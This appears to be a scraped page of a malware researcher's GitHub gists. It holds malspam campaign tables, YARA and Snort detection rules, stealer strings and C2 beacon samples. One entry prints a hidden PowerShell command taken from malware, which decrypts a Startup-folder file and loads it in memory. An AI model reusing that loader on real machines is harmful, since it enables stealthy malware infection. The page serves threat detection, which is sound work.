silence-is-best
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SELECT fieldname, value FROM moz_formhistory | |
| %s TRUE %s %s %s %s %s | |
| URL:%s | |
| USR:%s | |
| PASS:%s | |
| - Display size: %dx%d | |
| - Architecture: x%d | |
| - CPU: %s (%d cores) | |
| - Display Devices: | |
| formhistory.sqlite |
silence-is-best
/ gist:bec2429d71b8527dd14512efe8e53e02
Created
June 6, 2022 14:46
May 2022 Malspam Campaigns
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Date,Details,Email Payload Type,Users Targeted | |
| 5/4/2022,Quotation : RFQ : SH - 345; xlsx -> agenttesla,Attachment,46 | |
| 5/4/2022,Richiesta�per�invio�Mail�al�Cliente; xlsxm -> gozi,Attachment,2 | |
| 5/4/2022,IRS Correction letter; iso -> remcos,Attachment,5 | |
| 5/4/2022,CRITICAL RFQ FOR ENGINE // MAY 5th, 2022; link -> asyncrat,Link,3 | |
| 5/5/2022,Vak?fBank Kredi Kart? Hesap �zetiniz; rar -> azorult,Attachment,2 | |
| 5/8/2022,Attachment name is payment invoice..zip; zip -> spytector continued to 5/11,Attachment,44 | |
| 5/8/2022,RE:NEW PO; rar -> agenttesla,Attachment,2 | |
| 5/10/2022,DETALLES DEL PAGO; lzh -> xloader,Attachment,2 | |
| 5/11/2022,DHL Delivery Failed; iso -> remcos,Attachment,6 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| c2 comms info: | |
| {"status": "idle", "uniq_hash": "b2g/9HDXG/SqaQ=="} | |
| {"action":"ping","hwid":"Q9QXIUFLM61YIIEJX2702ICY096GL89B","pc_name":"JONATHAN-PC","os_name":"Win 7","arch":"x64","rights":"+","version":"MAY_3.2/B","workgroup":"? | ?","dns":0,"protocol_version":2} | |
| regkey set: | |
| powershell -windowstyle hidden -command "$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('AH9003f1pgWZl1bvey0sa6wYF9VAKpokDmiPEo9mEkc=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcSm9uYXRoYW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxqSkxnY2hORFlWWEhEV1RYamxRZlJSb0tocWYud2hYUFF1Skh2VUJFUg=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[rbavXKsXaHtcCIBRtvgmZmoJ7N5fk9n_hasQQmQM9.DBUDOKnmywFSZ]::p8OCwSsJRtmCPj6inmZE42bA4j8qe2gt |
silence-is-best
/ gist:cb08724865ab93dd369a8817062241ac
Created
May 11, 2022 17:13
Evil ConnectWise-ScreenConnect snort suricata sig
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert tcp any any -> any any (msg:"ScreenConnect-ConnectWise Initial Checkin"; content:"|87 15 10 00 00 00 00 00 00 00 00 00 00 00 00 00|"; fast_pattern; within:16; dsize:<600; classtype:trojan-activity; sid:20166341; rev:1; metadata:created_at 2022_05_11;) |
silence-is-best
/ gist:ae10c1b627faeb7ff9e4f05dbfb8c7db
Created
May 11, 2022 16:20
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule svcready_bin | |
| { | |
| meta: | |
| description = "SVCReady" | |
| author = "James_inthe_box" | |
| reference = "f690f484c1883571a8bbf19313025a1264d3e10f570380f7aca3cc92135e1d2e" | |
| date = "2022/05" | |
| maltype = "RAT" | |
| strings: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule nerbian_bin | |
| { | |
| meta: | |
| description = "Nerbian RAT" | |
| author = "James_inthe_box" | |
| reference = "https://app.any.run/tasks/778a4bd7-7ed2-4b61-aad5-822cd5195442/" | |
| date = "2022/05" | |
| maltype = "RAT" | |
| strings: |
silence-is-best
/ gist:dce8183ac6e7d41435e1cfa137e9a0a4
Created
May 4, 2022 21:56
In memory Bumblebee yara
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule Bumblebee_mem | |
| { | |
| meta: | |
| description = "Bumblebee loader" | |
| author = "James_inthe_box" | |
| reference = "7a2ac6664ef13971ce464676012092befde8f14b0013b2f0f3e21c9051cb45a0" | |
| date = "2022/05" | |
| maltype = "Loader" | |
| strings: |
silence-is-best
/ gist:2ba1bbd9f3ea73748b34283b6f114374
Created
May 3, 2022 17:47
25461 SYN ACK Host9x
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Src | |
| 102.165.51.115 | |
| 102.165.51.126 | |
| 102.165.51.188 | |
| 103.145.13.241 | |
| 103.145.13.242 | |
| 103.145.13.67 | |
| 149.18.38.10 | |
| 149.18.38.104 |
silence-is-best
/ gist:1daf2bda59a31041006a5022ac17b082
Created
May 2, 2022 15:29
April 2022 Malspam Campaigns
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Date,Details,Email Payload Type,Users Targeted | |
| 4/3/2022,Payment Advice - Advice Ref:[GLV124182676] / ACH credits / Customer Ref:; gz -> xloader,Attachment,2 | |
| 4/4/2022,Payment Regarding Shipment; zip -> agenttesla,Attachment,4 | |
| 4/4/2022,Re: NEW QUOTATION REQUEST; rar -> agenttesla,Attachment,4 | |
| 4/4/2022,Request For Quotation|RE: Invoice and Packing List; z -> agenttesla,Attachment,4 | |
| 4/5/2022,Payment Reciept; zip -> agenttesla,Attachment,4 | |
| 4/5/2022,BALANCE PAYMENT SWIFT /REF GO 2022/04; zip -> formbook,Attachment,2 | |
| 4/5/2022,Quotation Request - PT. Meidoh|Jacques B. Pierre | Product Enquiry#00183773386001; cab -> agenttesla,Attachment,4 | |
| 4/5/2022,Re: Re: Revised PI; xlsx -> formbook,Attachment,2 | |
| 4/6/2022,RE: Check Copy ID#711539; zip -> bitrat,Attachment,15 |
silence-is-best
/ gist:7ec6ce480371ad2e8bf40fcc77481825
Created
April 7, 2022 17:24
FBRobot yara sig
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule fbrobot_bin | |
| { | |
| meta: | |
| description = "fbrobot stealer" | |
| author = "James_inthe_box" | |
| reference = "https://app.any.run/tasks/317642cd-924b-4fe4-ba97-0c648f89c7a0" | |
| date = "2022/04" | |
| maltype = "Stealer" | |
| strings: |